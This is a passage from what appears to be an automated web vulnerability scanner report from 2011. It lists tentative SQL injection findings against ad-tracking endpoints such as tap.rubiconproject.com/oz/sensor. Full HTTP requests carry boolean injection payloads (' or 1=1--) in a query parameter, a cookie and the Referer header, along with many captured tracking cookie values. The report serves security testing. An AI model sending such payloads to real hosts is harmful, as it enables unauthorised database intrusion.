csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:34:07 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 20:34:08 GMT; Path=/
Set-Cookie: dq=46|5|41|0; Expires=Tue, 14-Feb-2012 20:34:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=19609074'%20or%201%3d2--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:34:07 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.14. http://tap.rubiconproject.com/oz/sensor [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The k parameter appears to be vulnerable to SQL injection attacks. The payloads 20698732'%20or%201%3d1--%20 and 20698732'%20or%201%3d2--%20 were each submitted in the k parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,20698732'%20or%201%3d1--%20&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:33:09 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 20:33:09 GMT; Path=/
Set-Cookie: dq=46|5|41|0; Expires=Tue, 14-Feb-2012 20:33:09 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,20698732'%20or%201%3d2--%20&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:33:09 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.15. http://tap.rubiconproject.com/oz/sensor [put_2132 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2132 cookie appears to be vulnerable to SQL injection attacks. The payloads 14208738'%20or%201%3d1--%20 and 14208738'%20or%201%3d2--%20 were each submitted in the put_2132 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD14208738'%20or%201%3d1--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:33:21 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 20:33:22 GMT; Path=/
Set-Cookie: dq=46|5|41|0; Expires=Tue, 14-Feb-2012 20:33:22 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD14208738'%20or%201%3d2--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; csi15=3181095.js^1^1297715001^1297715001&3188562.js^2^1297648333^1297714022&3143937.js^7^1297648330^1297714007&3137511.js^1^1297713995^1297713995&3188561.js^6^1297650509^1297713829&3139244.js^1^1297713817^1297713817&3143934.js^1^1297713810^1297713810&3187616.js^3^1297650874^1297652327&3181006.js^3^1297650871^1297652142&3153314.js^1^1297652140^1297652140&3187758.js^2^1297650147^1297651781&3136991.js^1^1297651597^1297651597&3162299.js^2^1297651233^1297651415&3155230.js^2^1297650696^1297651234&3170499.js^1^1297651052^1297651052&3187094.js^3^1297648693^1297650871&3176002.js^3^1297647212^1297650689&3187087.js^3^1297649055^1297650508&3191816.js^3^1297649600^1297650327&3137091.js^2^1297649419^1297649963&3187612.js^4^1297648875^1297649784&3137131.js^3^1297647789^1297649783&3162375.js^12^1297647220^1297649422&3171138.js^1^1297648512^1297648512&3171137.js^1^1297648149^1297648149&3147457.js^3^1297647605^1297647967&3192618.js^1^1297647357^1297647357&3158237.js^1^1297647346^1297647346&3170498.js^1^1297647240^1297647240; cd=false; dq=45|5|40|0; ses2=4801^2&11949^1; csi2=3187876.js^1^1297715032^1297715032&3174331.js^1^1297695974^1297695974&1356912.js^1^1297647367^1297647367

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 20:33:21 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.16. http://redcated/APM/iview/289800145/direct [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://redcated
Path:   /APM/iview/289800145/direct

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /APM/iview/289800145/direct HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6562
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 14 Feb 2011 20:07:38 GMT
Connection: close

<html><head><title>FY11_Win7_CoolNewProds_Games_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:
...[SNIP]...
<SCR' + 'IPT LANGUAGE=VBScript\>');
document.writeln('on error resume next');
document.writeln('Set oFlashPlayer = CreateObject("ShockwaveFlash.ShockwaveFlash." & nRequiredVersion)');
document.writeln('If IsObject(oFlashPlayer) Then');
document.writeln('bIsRig
...[SNIP]...

Request 2

